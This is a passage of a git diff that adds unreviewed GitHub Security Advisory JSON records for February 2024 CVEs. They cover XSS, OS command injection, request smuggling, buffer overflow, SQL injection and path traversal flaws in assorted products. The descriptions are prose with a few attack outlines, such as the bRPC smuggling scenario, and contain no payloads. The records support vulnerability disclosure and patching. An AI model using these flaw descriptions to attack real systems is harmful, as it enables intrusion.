b/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json new file mode 100644 index 0000000000000..3e17104866794 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-259r-2fr5-87c3", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24496" + ], + "details": "An issue in Daily Habit Tracker v.1.0 allows a remote attacker to manipulate trackers via the home.php, add-tracker.php, delete-tracker.php, update-tracker.php components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24496" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Broken_Access_Control.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json b/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json new file mode 100644 index 0000000000000..aa68f50f573a7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25c3-4v7x-3hrp", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1198" + ], + "details": "A vulnerability, which was classified as critical, was found in openBI up to 6.0.3. Affected is the function addxinzhi of the file application/controllers/User.php of the component Phar Handler. The manipulation of the argument outimgurl leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252696.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1198" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/qFXZZfp1NLa3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252696" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252696" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T00:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json b/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json new file mode 100644 index 0000000000000..d2337b401315e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25rq-9fcx-x8f3", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24877" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magic Hills Pty Ltd Wonder Slider Lite allows Reflected XSS.This issue affects Wonder Slider Lite: from n/a through 13.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24877" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json b/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json new file mode 100644 index 0000000000000..db6800bf15fec --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27rv-vgm8-cv35", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47561" + ], + "details": "A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.\n\nWe have already fixed the vulnerability in the following version:\nPhoto Station 6.4.2 ( 2023/12/15 ) and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47561" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json b/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json new file mode 100644 index 0000000000000..5aaa1f6022c98 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27xq-w3jc-436c", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2024-23109" + ], + "details": "An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23109" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-130" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T14:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json b/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json new file mode 100644 index 0000000000000..1c78902e11d48 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-283h-3w9j-26xq", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-38273" + ], + "details": "IBM Cloud Pak System 2.3.1.1, 2.3.2.0, and 2.3.3.7 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 260733.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38273" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260733" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105357" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json b/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json new file mode 100644 index 0000000000000..6db344bfdbdd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-283m-jhf4-68hp", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51694" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Epiphyt Embed Privacy allows Stored XSS.This issue affects Embed Privacy: from n/a through 1.8.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51694" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/embed-privacy/wordpress-embed-privacy-plugin-1-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json b/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json new file mode 100644 index 0000000000000..7d46d189f10f6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2862-59r4-c989", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T09:30:40Z", + "aliases": [ + "CVE-2024-23452" + ], + "details": "Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request.\n\nVulnerability Cause Description:\n\nThe http_parser does not comply with the RFC-7230 HTTP 1.1 specification.\n\nAttack scenario:\nIf a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting.\nOne particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server. \n\nSolution:\nYou can choose one solution from below:\n1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0\n 2. Apply this patch:  https://github.com/apache/brpc/pull/2518 \n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23452" + }, + { + "type": "WEB", + "url": "https://github.com/apache/brpc/pull/2518" + }, + { + "type": "WEB", + "url": "https://github.com/apache/brpc/releases/tag/1.8.0" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/08/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T09:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json b/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json new file mode 100644 index 0000000000000..59d8b59ac5d80 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-292c-8vv7-pg3v", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33067" + ], + "details": "Memory corruption in Audio while calling START command on host voice PCM multiple times for the same RX or TX tap points.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33067" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json b/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json new file mode 100644 index 0000000000000..6b93f92cda80f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-293v-32vx-9g86", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-22852" + ], + "details": "D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to enable telnet service via a specially crafted payload.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22852" + }, + { + "type": "WEB", + "url": "https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/1/1.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json new file mode 100644 index 0000000000000..a0cb2dd7072cd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c82-fg6w-rjhp", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1256" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1256" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252995" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252995" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json b/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json new file mode 100644 index 0000000000000..2f03b20f08995 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c8q-6p99-6rj3", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24834" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net allows Stored XSS.This issue affects BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net: from n/a through 1.1.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24834" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T14:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json b/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json new file mode 100644 index 0000000000000..875fffb885f0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cmm-m4c8-c4wp", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24263" + ], + "details": "Lotos WebServer v0.1.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the response_append_status_line function at /lotos/src/response.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24263" + }, + { + "type": "WEB", + "url": "https://github.com/LuMingYinDetect/lotos_detects/blob/main/lotos_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json b/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json new file mode 100644 index 0000000000000..83b99fa91be59 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cwc-8x85-2774", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-23553" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform exists due to missing a specific http header attribute. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23553" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json b/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json new file mode 100644 index 0000000000000..d3a3198bcad34 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cwx-f949-qq48", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24879" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS.This issue affects Link Library: from n/a through 7.5.13.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24879" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json b/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json new file mode 100644 index 0000000000000..d781abf221a3a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gw8-8q9v-75m8", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6808" + ], + "details": "The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6808" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/ameliabooking/trunk/view/frontend/events.inc.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3015149/ameliabooking/trunk/view/frontend/events.inc.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json b/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json new file mode 100644 index 0000000000000..93edc8f0d7a13 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j63-x9pq-h9wc", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-0971" + ], + "details": "\nA SQL injection vulnerability exists where an authenticated, low-privileged remote attacker could potentially alter scan DB content.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0971" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2024-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json b/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json new file mode 100644 index 0000000000000..60a9d3582ab1d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j7g-cpcm-93qx", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24942" + ], + "details": "In JetBrains TeamCity before 2023.11.3 path traversal allowed reading data within JAR archives", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24942" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json new file mode 100644 index 0000000000000..4703f69c0604b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q4f-xv44-vmqf", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22238" + ], + "details": "Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22238" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json b/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json new file mode 100644 index 0000000000000..b25a8918a0ee9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qm8-4j25-v4w6", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24265" + ], + "details": "gpac v2.2.1 was discovered to contain a memory leak via the dst_props variable in the gf_filter_pid_merge_properties_internal function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24265" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": 